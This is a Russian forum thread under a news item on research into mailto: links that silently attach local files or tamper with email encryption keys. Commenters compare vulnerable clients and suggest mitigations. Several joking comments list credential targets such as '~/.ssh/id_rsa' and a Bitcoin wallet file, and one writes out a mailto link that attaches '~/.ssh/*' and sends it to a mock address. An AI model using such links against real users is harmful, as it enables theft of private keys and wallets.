Вариант для распечатки | 
   
   
    
    Пред. тема | След. тема  | ||
| Форум Разговоры, обсуждение новостей | |||
|---|---|---|---|
| Изначальное сообщение | [ Отслеживать ] | ||
| "Атака на пользователей почтовых клиентов при помощи ссылок 'mailto:'" | +/– | |
| Сообщение от opennews (?), 19-Авг-20, 14:41 | ||
Исследователи из Рурского университета в Бохуме (Германия) проанализировали (PDF) поведение почтовых клиентов при обработке ссылок "mailto:" с расширенными параметрами. Пять из двадцати рассмотренных почтовых клиентов оказались уязвимы для атаки, манипулирующей подстановкой ресурсов при помощи параметра "attach". Ещё шесть почтовых клиентов были подвержены атаке по замене ключей PGP и S/MIME, а три клиента оказались уязвимы для атаки по извлечению содержимого зашифрованных сообщений...  | ||
| Ответить | Правка | Cообщить модератору | ||
| Оглавление | 
| Сообщения | [Сортировка по времени | RSS] | 
| 1. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +14 +/– | |
| Сообщение от jfdbngh (?), 19-Авг-20, 14:41 | ||
Если каждый китаец наберет случайную строку на клавиатуре, то с 99% вероятностью получится эксплоит.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 2. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от DeerFriend (?), 19-Авг-20, 14:45 | ||
Господин Трамп может подтвердить, что у них уже получилось.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 3. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от Аноним (3), 19-Авг-20, 14:46 | ||
>Пять из двадцати рассмотренных почтовых клиентов  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 15. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Аноним (15), 19-Авг-20, 15:10 | ||
mailx  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 18. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –6 +/– | |
| Сообщение от жека воробьев (?), 19-Авг-20, 15:16 | ||
outlook  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 21. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним84701 (ok), 19-Авг-20, 15:25 | ||
> outlook  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 22. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
Сообщение от Перастерос  (ok), 19-Авг-20, 15:29  | ||
аутглюк, аут!  | ||
| Ответить | Правка | К родителю #18 | Наверх | Cообщить модератору | ||
| 107. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от rvs2016 (ok), 23-Авг-20, 22:13 | ||
pine! Alpine!  | ||
| Ответить | Правка | К родителю #18 | Наверх | Cообщить модератору | ||
| 20. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним84701 (ok), 19-Авг-20, 15:23 | ||
>>Пять из двадцати рассмотренных почтовых клиентов  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 59. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (59), 19-Авг-20, 20:35 | ||
> The attach parameter of mailto URIs is not supported.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 89. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним84701 (ok), 20-Авг-20, 12:03 | ||
>> The attach parameter of mailto URIs is not supported.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 106. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Убить_Криса (?), 23-Авг-20, 09:13 | ||
Очень глючный  | ||
| Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору | ||
| 23. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (23), 19-Авг-20, 15:42 | ||
aerc  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 33. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от Siborgium (ok), 19-Авг-20, 17:18 | ||
Тормозное и глючное Goвно. Зря Drew DeVault изменил сишке, авось лучше бы получилось. Пользовался примерно неделю, вообще не понравилось. (neo)mutt, и тот лучше.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 26. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от ss (??), 19-Авг-20, 16:07 | ||
Пишите!  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 28. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –8 +/– | |
| Сообщение от Аноним (28), 19-Авг-20, 16:16 | ||
Gmail  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 31. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Алексей (??), 19-Авг-20, 16:52 | ||
KMail.  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 109. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от ___ (??), 24-Авг-20, 07:55 | ||
Тащить себе половину KDE ради почтовика?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 68. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Ilya Indigo (ok), 19-Авг-20, 22:44 | ||
Trojita к этому не уязвима, только что проверил!  | ||
| Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору | ||
| 76. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от iPony129412 (?), 20-Авг-20, 06:43 | ||
Ну так уязвимости в Thunderbird нет.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 79. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Атон (?), 20-Авг-20, 10:09 | ||
Эк тебя задело..  | ||
| Ответить | Правка | К родителю #68 | Наверх | Cообщить модератору | ||
| 4. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 14:51 | ||
> путь_к_файлу  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 5. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (5), 19-Авг-20, 14:53 | ||
~/.bitcoin/wallet.dat  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 6. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –3 +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 14:54 | ||
А если нет такого?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 7. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +13 +/– | |
| Сообщение от Ag (ok), 19-Авг-20, 14:56 | ||
На значит на этой машине не повезло, ждем-с другую. Интернет-с - он большой.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 9. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –4 +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 14:59 | ||
Так это глупо - отвечать на письма от незнакомых адресатов. Их в спам помещают или игнорируют.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 19. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +4 +/– | |
| Сообщение от жека воробьев (?), 19-Авг-20, 15:17 | ||
тут не про отвечать, а про ссылки mailto  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 53. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +4 +/– | |
| Сообщение от Аноним (53), 19-Авг-20, 20:07 | ||
Почему сразу "не знакомых"? А может знакомых. Может это какой-то магазин офигительных товаров и скидок куда пользователь пишет письмо т.к. на сайте написано "напишите нам и мы отправим вам товар". Пользователь пишет, ему в ответ приходит "ваш товар готов к отправке, вам удобно получить товар на этой или на следующей неделе" и вот в этом письме mailto.  | ||
| Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору | ||
| 12. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 15:01 | ||
> Thunderbird позволяет прикреплять группы файлов  | ||
| Ответить | Правка | К родителю #7 | Наверх | Cообщить модератору | ||
| 78. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Атон (?), 20-Авг-20, 09:59 | ||
Люди в это окошко не заглядывают даже когда сами добавили или должны были добавить аттач.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 8. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –3 +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 14:57 | ||
И такого нет  | ||
| Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору | ||
| 11. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от Иваня (?), 19-Авг-20, 15:01 | ||
~$ cat ~/.ssh/id_rsa  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 27. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +3 +/– | |
| Сообщение от ss (??), 19-Авг-20, 16:11 | ||
Вы просто не участвуете соревновании. Спокойно игнорируйте :)  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 66. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Ilya Indigo (ok), 19-Авг-20, 22:26 | ||
У нормальных пользоватедей давно уже  | ||
| Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору | ||
| 80. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Атон (?), 20-Авг-20, 10:14 | ||
Поподробнее пожалуйста расскажите [a href=mailto:?to=fsb@nsa.gov&subject="Докладываю про нормальных пользователей подробнее"&body="Позвольте приложить список нормальных пользователей "&attach=~/.ssh/*]про нормальных пользователей[/a]. Очень интересно  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 16. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от Аноним (15), 19-Авг-20, 15:13 | ||
Страдание путь твой, человек.  | ||
| Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору | ||
| 10. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от yet another anonymous (?), 19-Авг-20, 15:01 | ||
html в почте --- плохо. Нелокальное действие при обработке содержимого --- не плохо, а альтернативноодарённо.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 13. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от Аноним (4), 19-Авг-20, 15:02 | ||
По умолчанию отключено.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 14. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
Сообщение от Аноним  (14), 19-Авг-20, 15:10  | ||
Вывод, как минимум, не хранить важных данных в стандартных каталогах  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 34. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от Siborgium (ok), 19-Авг-20, 17:29 | ||
OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 38. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
Сообщение от Michael Shigorin  (ok), 19-Авг-20, 18:31  | ||
Вас никто не заставляет ключи openssh держать в файлах с предсказуемыми именами (да и путями тоже). Это превратит почти неинтерактивную атаку с одним-единственным элементом социнжиниринга ("лишь бы не заметил список приложений") в как минимум двухстадийную целенаправленную при необходимости её успеха -- сперва надо выкрасть ~/.ssh/config и посмотреть IdentityFile.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 90. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от ALex_hha (ok), 20-Авг-20, 13:00 | ||
а шифрование приватого ключа - вообще делает такие атаки бессмысленными, от слова совсем  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 40. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним84701 (ok), 19-Авг-20, 18:49 | ||
> OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?  | ||
| Ответить | Правка | К родителю #34 | Наверх | Cообщить модератору | ||
| 96. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Аноним (96), 20-Авг-20, 22:32 | ||
ага. типичный линуксокостыль - на каждый пук заводить по пользователю. зачёт. ещё и группу можно.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 97. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
Сообщение от Michael Shigorin  (ok), 20-Авг-20, 22:39  | ||
> ага. типичный линуксокостыль  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 35. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Siborgium (ok), 19-Авг-20, 17:29 | ||
Да и само ваше "решение" лечит в лучшем случае симптомы, а не проблему.  | ||
| Ответить | Правка | К родителю #14 | Наверх | Cообщить модератору | ||
| 17. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +4 +/– | |
Сообщение от тоже Аноним  (ok), 19-Авг-20, 15:14  | ||
Создал файл со ссылкой  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 25. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от ss (??), 19-Авг-20, 15:54 | ||
Может чтобы оно сработало надо плагин поставить?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 29. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
Сообщение от тоже Аноним  (ok), 19-Авг-20, 16:21  | ||
> Может чтобы оно сработало надо плагин поставить?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 30. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от ss (??), 19-Авг-20, 16:22 | ||
Предварительно пропатчив авторскими фиксами после посылки багрепорта...  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 36. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +7 +/– | |
| Сообщение от Аноним (36), 19-Авг-20, 17:52 | ||
Да ну нфиг слишком сложно пишите просто сразу куда слать этот ~/.ssh/id_rsa файл?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 108. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от rvs2016 (ok), 23-Авг-20, 22:17 | ||
> Да ну нфиг слишком сложно пишите просто сразу  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 32. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (32), 19-Авг-20, 16:52 | ||
Мои эксперименты с kmail дали такой результат: оно действительно пытается приложить файл, но это всегда заканчивается ошибкой "файл не существует". Хотя я проверял на тех файлах, что 100% существуют и доступны.  | ||
| Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору | ||
| 37. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от sergey (??), 19-Авг-20, 18:03 | ||
Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 41. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от тоже Аноним (ok), 19-Авг-20, 19:25 | ||
> Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 43. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +3 +/– | |
| Сообщение от Аноним (43), 19-Авг-20, 19:37 | ||
/root/.ssh/id_rsa  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 49. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от тоже Аноним (ok), 19-Авг-20, 19:53 | ||
> /root/.ssh/id_rsa  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 52. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (52), 19-Авг-20, 20:06 | ||
>Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.  | ||
| Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору | ||
| 57. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от тоже Аноним (ok), 19-Авг-20, 20:18 | ||
> Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 99. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от OpenEcho (?), 21-Авг-20, 02:07 | ||
> Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.  | ||
| Ответить | Правка | К родителю #41 | Наверх | Cообщить модератору | ||
| 100. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от тоже Аноним (ok), 21-Авг-20, 13:32 | ||
> $HOME/.ssh/id_rsa  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 101. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от OpenEcho (?), 21-Авг-20, 16:37 | ||
>> $HOME/.ssh/id_rsa  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 102. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от тоже Аноним (ok), 21-Авг-20, 17:33 | ||
> Тильда ~ это не есть функция файловой системы. Это алиас шела  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 103. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от OpenEcho (?), 21-Авг-20, 22:41 | ||
Причем здесь новость? я отвечал на вопрос:  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 104. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от тоже Аноним (ok), 21-Авг-20, 23:17 | ||
> Причем здесь новость? я отвечал на вопрос:  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 42. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Bdfybec (?), 19-Авг-20, 19:32 | ||
> вложения были добавлены внешней программой  | ||
| Ответить | Правка | К родителю #32 | Наверх | Cообщить модератору | ||
| 54. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Sluggard (ok), 19-Авг-20, 20:08 | ||
Видимо, подразумевается программа, в которой открывалась ссылка «mailto:» — она ведь передала параметр «attach».  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 63. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (63), 19-Авг-20, 21:24 | ||
Mailspring (snap):  | ||
| Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору | ||
| 65. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от анончик (?), 19-Авг-20, 21:55 | ||
ну так оно ж в песочнице, это ж snap  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 75. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от iPony129412 (?), 20-Авг-20, 06:12 | ||
SNAP не обязует песочницу.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 74. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от iPony129412 (?), 20-Авг-20, 06:04 | ||
https://snapcraft.io/docs/environment-variables  | ||
| Ответить | Правка | К родителю #63 | Наверх | Cообщить модератору | ||
| 24. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Аноним (23), 19-Авг-20, 15:44 | ||
Больше похоже на "браузеры не фильтруют параметры для почтовиков".  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 58. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от Аноним (59), 19-Авг-20, 20:31 | ||
С какой стати они должны что-то фильтровать в URL?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 61. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (23), 19-Авг-20, 20:45 | ||
Чтобы их пользователю не насовали интересного?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 67. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (59), 19-Авг-20, 22:38 | ||
И что, им теперь надо научиться разбирать URL для всех схем со всеми возможными параметрами и начать подменять их?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 105. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (105), 22-Авг-20, 10:56 | ||
Зачем для всех, дорогой, речь про вполне определённый mailto.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 39. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
Сообщение от Michael Shigorin  (ok), 19-Авг-20, 18:32  | ||
Ну вот, опять не вижу в списке mutt...  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 48. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от kusb (?), 19-Авг-20, 19:51 | ||
Консольные программы самые надёжные?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 95. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от PnD (??), 20-Авг-20, 22:30 | ||
А он есть©  | ||
| Ответить | Правка | К родителю #39 | Наверх | Cообщить модератору | ||
| 44. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от user (??), 19-Авг-20, 19:39 | ||
Это дыра в стандарте mailto.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 47. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +3 +/– | |
| Сообщение от kusb (?), 19-Авг-20, 19:50 | ||
Почему дыра? Это часть стандарта?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 45. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
| Сообщение от Аноним (45), 19-Авг-20, 19:39 | ||
>специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:<  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 46. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –3 +/– | |
| Сообщение от kusb (?), 19-Авг-20, 19:47 | ||
Для того, чтобы отправить файл на наш сервис переименуйте его в send.txt и расположите его в кoрнe диска "C:" согласившись при надобности с изменением расширения нажав кнопку "да" в диалоге (рис. 1).  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 50. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от Аноним (50), 19-Авг-20, 19:55 | ||
Ыыыы... Какая прелесть!  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 51. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (51), 19-Авг-20, 19:59 | ||
как неожиданно!  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 55. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
Сообщение от timur.davletshin  (ok), 19-Авг-20, 20:08  | ||
Стандартный Evolution из Debian stable прикрепляет и выводит в шапке письма предупреждение о том, что файл из скрытого каталога и может содержать приватную информацию. Т.е. сказать, что совсем об этом никто никогда не думал, нельзя.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 56. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (45), 19-Авг-20, 20:13 | ||
а не из скрытого что?  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 64. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +2 +/– | |
Сообщение от timur.davletshin  (ok), 19-Авг-20, 21:30  | ||
А так и было задумано... Вообще, я не вижу ничего критичного в таком поведении. Кнопку "Send" за меня оно не нажимает и ладно. Если пользователь настолько олень, что не смотрит, что отправляет, то это его личные проблемы.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 81. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от kusb (?), 20-Авг-20, 10:41 | ||
Вот я не согласен, дело в том, что я не слишком ожидаю отправки файла почтовиком из моей файловой системы. Я скорее не хочу быть постоянно напряжённым работая с компьютером проверяя то, что предлагаемые функции не делают плохие вещи.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 83. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от kusb (?), 20-Авг-20, 10:48 | ||
Ну ладно, может иногда и проверяю и в этом есть часть вранья. Про имя файла по умолчанию так вообще не уверен даже.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 84. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от kusb (?), 20-Авг-20, 10:50 | ||
Ну ладно, Синаптиком я не пользуюсь.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 87. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
Сообщение от timur.davletshin  (ok), 20-Авг-20, 11:20  | ||
Берёшь apparmor профиль private-files-strict и запиливаешь его в качестве основы для своего любимого почтовика. Например, именно на его основе стоковый модуль для Evince режет доступ к каталогам gnupg, ssh, почты и чего-то, что я уже не помню.  | ||
| Ответить | Правка | К родителю #81 | Наверх | Cообщить модератору | ||
| 60. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Анонннннннннн (?), 19-Авг-20, 20:39 | ||
Почтовик в контейнер, виртуалку, или пароль за запуск.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 62. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (62), 19-Авг-20, 21:03 | ||
Спалил контору =(((( ну по крайне мере последние лет 5 это стабильно работало. и да Хелло html2pdf, dompdf и рукожопы 97% ;)  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 85. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Нечего (?), 20-Авг-20, 11:11 | ||
Что если эволютион отправить в дев нуль что бы он не смог работать на мне , давно замечаю эту блоатварь которую не вызывал гуляющей по диспетчеру задач , ну ладно крон итд , а эта то гуляет зачем ? Я уж думаю линукс особенно убунточка исправится хотя бы на нашей территории если директором этого филиала буду я , а не яндекс который прибежал уже после.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 69. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от Kuromi (ok), 19-Авг-20, 23:25 | ||
*Facepalm*  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 70. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +5 +/– | |
Сообщение от Аноним  (70), 20-Авг-20, 00:44  | ||
Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые ящики? Просто интересно  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 94. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Kuromi (ok), 20-Авг-20, 21:41 | ||
> Старомодно? А какие инструменты, на ваш взгляд актуальны, чем можно заменить почтовые  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 82. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от iPony129412 (?), 20-Авг-20, 10:44 | ||
> уже и почта-то - просто старомодной как-то  | ||
| Ответить | Правка | К родителю #69 | Наверх | Cообщить модератору | ||
| 72. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (72), 20-Авг-20, 03:33 | ||
А поясните, пользователь сам потом отсылает письмо? Не автоматически же отсылается через mailto.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 73. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от Аноним (73), 20-Авг-20, 05:44 | ||
Да, поэтому там указано, что "пользователь может не заметить". То есть, может и заметить, а если бы уходило автоматически, то замечание не имело бы смысла.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 77. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от iPony129412 (?), 20-Авг-20, 07:13 | ||
https://twitter.com/tsdgeos/status/1295493399638941696  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 86. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Аноним (86), 20-Авг-20, 11:17 | ||
firejail "Ваш любимый почтовый клиент"  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 88. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –1 +/– | |
| Сообщение от ИмяХ (?), 20-Авг-20, 11:57 | ||
